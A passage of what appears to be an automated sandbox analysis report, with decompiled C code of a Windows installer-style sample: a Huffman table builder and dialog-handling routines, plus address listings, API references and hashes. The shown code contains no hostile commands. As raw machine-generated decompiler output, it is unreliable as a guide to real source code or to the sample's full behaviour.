				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d688 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d688;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d688 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































              0x00406f24
              0x00406f2c
              0x00406f30
              0x00406f32
              0x00406f35
              0x00406f37
              0x00406f37
              0x00406f39
              0x00406f40
              0x00406f42
              0x00406f42
              0x00406f48
              0x00406f5d
              0x00406f65
              0x00406f67
              0x00406f69
              0x00406f6c
              0x00406f6d
              0x00406f6d
              0x00406f73
              0x00000000
              0x00000000
              0x00406f75
              0x00406f78
              0x00000000
              0x00000000
              0x00000000
              0x00406f78
              0x00406f7c
              0x00406f7f
              0x00406f81
              0x00406f81
              0x00406f84
              0x00406f8a
              0x00406f8b
              0x00000000
              0x00000000
              0x00000000
              0x00406f8b
              0x00406f90
              0x00406f93
              0x00406f95
              0x00406f95
              0x00406f9b
              0x00406f9d
              0x00406fae
              0x00406fa1
              0x00406fa5
              0x0040724a
              0x00000000
              0x0040724a
              0x00406fab
              0x00406fac
              0x00406fac
              0x00406fb4
              0x00406fb7
              0x00406fbb
              0x00406fbd
              0x00406fbf
              0x00406fc2
              0x00000000
              0x00000000
              0x00406fca
              0x00406fd0
              0x00406fd2
              0x00406fd4
              0x00406fd5
              0x00406fea
              0x00406fea
              0x00406fed
              0x00406fef
              0x00406fef
              0x00406ff1
              0x00406ff6
              0x00406ff8
              0x00406fff
              0x00407001
              0x00407009
              0x00407009
              0x0040700b
              0x0040700c
              0x0040701b
              0x0040701f
              0x00407023
              0x00407026
              0x00407029
              0x0040702e
              0x00407031
              0x00407037
              0x0040703e
              0x00407044
              0x0040723d
              0x0040723d
              0x00407242
              0x00407251
              0x00000000
              0x00000000
              0x00000000
              0x00407242
              0x00407051
              0x00407054
              0x00407057
              0x0040705a
              0x0040705e
              0x00000000
              0x00000000
              0x00407069
              0x0040706c
              0x0040706d
              0x0040706f
              0x00407075
              0x00407078
              0x00000000
              0x00000000
              0x0040707e
              0x0040707f
              0x00407082
              0x00407085
              0x00407088
              0x0040708e
              0x00407090
              0x00407090
              0x00407098
              0x0040709c
              0x004070a1
              0x004070c6
              0x004070cc
              0x004070ce
              0x004070d0
              0x004070d3
              0x004070dc
              0x00000000
              0x00000000
              0x004070a3
              0x004070a3
              0x004070ac
              0x004070b0
              0x00000000
              0x00000000
              0x004070c1
              0x004070c1
              0x004070c4
              0x00000000
              0x00000000
              0x004070b4
              0x004070b7
              0x004070b9
              0x004070bd
              0x00000000
              0x00000000
              0x004070bf
              0x004070bf
              0x00000000
              0x004070c1
              0x004070e5
              0x004070eb
              0x004070f5
              0x004070f7
              0x004070fc
              0x004070fe
              0x00407134
              0x00407100
              0x00407100
              0x00407103
              0x00407106
              0x00407110
              0x00407113
              0x0040711a
              0x00407125
              0x0040712c
              0x0040712c
              0x00407136
              0x00407139
              0x0040713b
              0x00407141
              0x00407141
              0x0040714a
              0x0040714d
              0x00407152
              0x00407161
              0x00407169
              0x0040716e
              0x00407192
              0x0040719a
              0x0040719e
              0x004071a4
              0x00407170
              0x0040717e
              0x00407181
              0x00407187
              0x00407187
              0x004071a8
              0x00407163
              0x00407163
              0x00407163
              0x004071b9
              0x004071bd
              0x004071c9
              0x004071c4
              0x004071c7
              0x004071c7
              0x004071d1
              0x004071d6
              0x004071de
              0x004071da
              0x004071dc
              0x004071dc
              0x004071e4
              0x004071e6
              0x004071ed
              0x004071f7
              0x00407201
              0x0040721d
              0x00407221
              0x00407066
              0x0040706c
              0x0040706d
              0x0040706f
              0x00407075
              0x00407078
              0x00000000
              0x00000000
              0x00000000
              0x00407078
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407203
              0x00407203
              0x00407203
              0x00407208
              0x00407211
              0x0040721a
              0x00000000
              0x0040721a
              0x00407227
              0x00407227
              0x0040722a
              0x00407231
              0x00407234
              0x00000000
              0x00407057
              0x00406fd7
              0x00406fd9
              0x00406fd9
              0x00406fdd
              0x00406fe0
              0x00406fe1
              0x00406fe1
              0x00000000
              0x00406fd9
              0x00406f4d
              0x00406f53
              0x00000000

              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
              • Instruction ID: 968ea090ea57439d934916100a42e081e4144f1e312078ddc892fc3721ce49e9
              • Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
              • Instruction Fuzzy Hash: 18C14A31E0421ACBCF14CF68D4905EEBBB2BF99314F25866AD8567B380D734A942CF95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403B52 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
              Download Yara Rule
              C-Code - Quality: 84%
              			E00403B52(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t142;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a858 = _t35;
					if(_t116 == 0x110) {
						 *0x42f408 = _t126;
						 *0x42a86c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429838 = _t92;
						E00404026(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ebe8);
						 *0x42ebcc = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a858 = 1;
					}
					_t123 =  *0x40a1dc; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f440;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E00404072(0x40b);
						while(1) {
							_t37 =  *0x42a858;
							 *0x40a1dc =  *0x40a1dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1dc; // 0xffffffff
							__eflags = _t39 -  *0x42f444;
							if(_t39 ==  *0x42f444) {
								E0040140B(1);
							}
							__eflags =  *0x42ebcc - _t134; // 0x1
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x42f444; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E00405F87(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E00404026(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E00404026(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E00404026(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4ac - _t134;
							_v32 = _t49;
							if( *0x42f4ac != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E00404048(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429838, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4ac - _t134;
							if( *0x42f4ac == _t134) {
								_push( *0x42a86c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429838);
							}
							E0040405B();
							E00405F65(0x42a870, E00403B33());
							E00405F87(0x42a870, _t126, _t131,  &(0x42a870[lstrlenA(0x42a870)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a870);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ebd8);
									 *0x42a048 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f400,  *_t131 +  *0x42ebe0 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ebd8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E00404026(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ebd8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ebcc - _t134; // 0x1
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ebd8, 8);
									E00404072(0x405);
									goto L58;
								}
								__eflags =  *0x42f4ac - _t134;
								if( *0x42f4ac != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4a0 - _t134;
								if( *0x42f4a0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebd8);
						 *0x42f408 = _t134;
						EndDialog(_t126,  *0x429c40);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ebd8, 0x40f, 0, 1);
						__eflags =  *0x42ebcc - _t134; // 0x1
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a850, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a850,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E0040408D(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ebd8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4ac - _t134;
										if( *0x42f4ac == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c40 = 1;
											L21:
											_push(0x78);
											L22:
											E00403FFF();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c40 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1dc - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ebd8);
						 *0x42ebd8 = _a12;
						L58:
						_t142 =  *0x42b870 - _t134; // 0x0
						if(_t142 == 0) {
							_t143 =  *0x42ebd8 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b870 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































              0x00403b5b
              0x00403b64
              0x00403ca5
              0x00403ca9
              0x00403cad
              0x00403caf
              0x00403cb4
              0x00403cbf
              0x00403cca
              0x00403ccf
              0x00403cd1
              0x00403cd3
              0x00403cd6
              0x00403cdb
              0x00403ce9
              0x00403cf6
              0x00403cfd
              0x00403cfd
              0x00403cfe
              0x00403cfe
              0x00403d03
              0x00403d09
              0x00403d10
              0x00403d16
              0x00403d18
              0x00403d58
              0x00403d5d
              0x00403d62
              0x00403d62
              0x00403d67
              0x00403d70
              0x00403d72
              0x00403d77
              0x00403d7d
              0x00403d81
              0x00403d81
              0x00403d86
              0x00403d8c
              0x00000000
              0x00000000
              0x00403d97
              0x00403d9d
              0x00000000
              0x00000000
              0x00403da6
              0x00403dae
              0x00403db3
              0x00403db6
              0x00403dbc
              0x00403dc1
              0x00403dc4
              0x00403dca
              0x00403dcf
              0x00403dd2
              0x00403dd8
              0x00403de0
              0x00403de6
              0x00403dec
              0x00403df0
              0x00403df7
              0x00403df7
              0x00403df7
              0x00403e01
              0x00403e13
              0x00403e1f
              0x00403e24
              0x00403e2e
              0x00403e34
              0x00403e36
              0x00403e3b
              0x00403e38
              0x00403e38
              0x00403e38
              0x00403e4b
              0x00403e63
              0x00403e65
              0x00403e6b
              0x00403e80
              0x00403e6d
              0x00403e76
              0x00403e78
              0x00403e78
              0x00403e86
              0x00403e97
              0x00403ea8
              0x00403eaf
              0x00403eb5
              0x00403eb9
              0x00403ebe
              0x00403ec0
              0x00000000
              0x00403ec6
              0x00403ec6
              0x00403ec8
              0x00000000
              0x00000000
              0x00403ece
              0x00403ed2
              0x00403ef7
              0x00403efd
              0x00403f03
              0x00403f05
              0x00000000
              0x00000000
              0x00403f2b
              0x00403f31
              0x00403f33
              0x00403f38
              0x00000000
              0x00000000
              0x00403f3e
              0x00403f41
              0x00403f44
              0x00403f5b
              0x00403f67
              0x00403f80
              0x00403f86
              0x00403f8a
              0x00403f8f
              0x00403f95
              0x00000000
              0x00000000
              0x00403f9f
              0x00403faa
              0x00000000
              0x00403faa
              0x00403ed4
              0x00403eda
              0x00000000
              0x00000000
              0x00403ee0
              0x00403ee6
              0x00000000
              0x00000000
              0x00000000
              0x00403eec
              0x00403ec0
              0x00403fb7
              0x00403fc3
              0x00403fca
              0x00000000
              0x00403d1a
              0x00403d1a
              0x00403d1d
              0x00403d50
              0x00403d50
              0x00403d52
              0x00000000
              0x00000000
              0x00000000
              0x00403d52
              0x00403d1f
              0x00403d23
              0x00403d28
              0x00403d2a
              0x00000000
              0x00000000
              0x00403d3a
              0x00403d42
              0x00000000
              0x00403d48
              0x00403b76
              0x00403b76
              0x00403b7a
              0x00403b7f
              0x00403b8e
              0x00403b8e
              0x00403b97
              0x00403ba0
              0x00403bab
              0x00403bab
              0x00403bb7
              0x00403bd3
              0x00403bd6
              0x00403be9
              0x00403bef
              0x00403c92
              0x00000000
              0x00403c9b
              0x00403bf5
              0x00403c02
              0x00403c04
              0x00403c06
              0x00403c25
              0x00403c25
              0x00403c28
              0x00403c2d
              0x00403c30
              0x00403c40
              0x00403c41
              0x00403c43
              0x00403c79
              0x00403c8c
              0x00000000
              0x00403c8c
              0x00403c45
              0x00403c4b
              0x00403c64
              0x00403c69
              0x00403c6b
              0x00000000
              0x00000000
              0x00403c6d
              0x00403c59
              0x00403c59
              0x00403c5b
              0x00403c5b
              0x00000000
              0x00403c5b
              0x00403c4e
              0x00403c53
              0x00000000
              0x00403c53
              0x00403c32
              0x00403c38
              0x00000000
              0x00000000
              0x00403c3a
              0x00000000
              0x00403c3a
              0x00403c2a
              0x00000000
              0x00403c2a
              0x00403c10
              0x00403c17
              0x00403c1d
              0x00403c1f
              0x00000000
              0x00000000
              0x00000000
              0x00403c1f
              0x00403bdb
              0x00000000
              0x00403bb9
              0x00403bbf
              0x00403bc9
              0x00403fd0
              0x00403fd0
              0x00403fd6
              0x00403fd8
              0x00403fde
              0x00403fe3
              0x00403fe9
              0x00403fe9
              0x00403fde
              0x00403ff3
              0x00000000
              0x00403ff3
              0x00403bb7

              APIs
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B8E
              • ShowWindow.USER32(?), ref: 00403BAB
              • DestroyWindow.USER32 ref: 00403BBF
              • SetWindowLongA.USER32 ref: 00403BDB
              • GetDlgItem.USER32 ref: 00403BFC
              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C10
              • IsWindowEnabled.USER32(00000000), ref: 00403C17
              • GetDlgItem.USER32 ref: 00403CC5
              • GetDlgItem.USER32 ref: 00403CCF
              • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403CE9
              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D3A
              • GetDlgItem.USER32 ref: 00403DE0
              • ShowWindow.USER32(00000000,?), ref: 00403E01
              • EnableWindow.USER32(?,?), ref: 00403E13
              • EnableWindow.USER32(?,?), ref: 00403E2E
              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E44
              • EnableMenuItem.USER32 ref: 00403E4B
              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E63
              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E76
              • lstrlenA.KERNEL32(0042A870,?,0042A870,00000000), ref: 00403EA0
              • SetWindowTextA.USER32(?,0042A870), ref: 00403EAF
              • ShowWindow.USER32(?,0000000A), ref: 00403FE3
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
              • String ID:
              • API String ID: 184305955-0
              • Opcode ID: 73a332412999680b2dcb521756cc8655f7b5c6597c26b8181da5b9882737dc52
              • Instruction ID: 825bbfaa6b66e15a56cde4951677423d70b10f791e0768be12abaf391e468a8e
              • Opcode Fuzzy Hash: 73a332412999680b2dcb521756cc8655f7b5c6597c26b8181da5b9882737dc52
              • Instruction Fuzzy Hash: 80C19F71604205AFDB206F22EE45E2B3EBCFB4570AF40053EFA42B11E1CB7999429B1D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040416F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E0040416F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x42983c =  *0x42983c + 1;
								__eflags =  *0x42983c;
							}
							L25:
							_t110 = _a16;
							L26:
							return E0040408D(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x42e3a0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									E00404413(_a4, _v8);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
